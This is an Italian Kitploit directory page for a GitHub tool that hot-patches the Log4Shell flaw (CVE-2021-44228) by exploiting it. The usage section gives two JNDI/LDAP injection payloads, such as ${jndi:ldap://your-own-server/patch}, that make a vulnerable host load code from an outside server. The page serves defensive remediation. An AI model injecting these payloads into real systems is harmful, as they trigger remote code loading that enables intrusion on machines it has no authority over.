Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2021-44228-qingteng-online-patch — Correggi a caldo CVE-2021-44228 sfruttando la vulnerabilità stessa. | Kitploit
Strumenti/GitHubGitHub/qingtengyun/cve-2021-44228-qingteng-online-patch
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlRisposta agli Incidenti
GitHubqingtengyun/cve-2021-44228-qingteng-online-patch

cve-2021-44228-qingteng-online-patch

Correggi a caldo CVE-2021-44228 sfruttando la vulnerabilità stessa.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
25424 anni faRevisionato da Kitploit
Condividi

cve-2021-44228-qingteng-online-patch

Cos'è

Hot-patch per CVE-2021-44228 sfruttando la vulnerabilità stessa.

Come usarlo

Inietta il seguente codice in qualsiasi punto probabilmente vulnerabile a CVE-2021-44228,

root@kitploit:~
${jndi:ldap://your-own-server/patch}

Per prevenire attacchi MITM durante il processo di patch, si consiglia il seguente payload, ma con minore compatibilità per versioni precedenti di Java,

root@kitploit:~
${jndi:ldap://your-own-server/any_string_except_patch}

Avvia il tuo server

  1. Scarica l'ultima release

  2. Specifica le variabili d'ambiente di sistema LOG4J_HOTFIX_HTTP_PATH e LOG4J_HOTFIX_HTTPS_PATH se vuoi ospitare Hotfix.class sul tuo server

Build

Nota che Hotfix.java deve essere compilato con JDK6 per la massima compatibilità.

Scarica lo strumento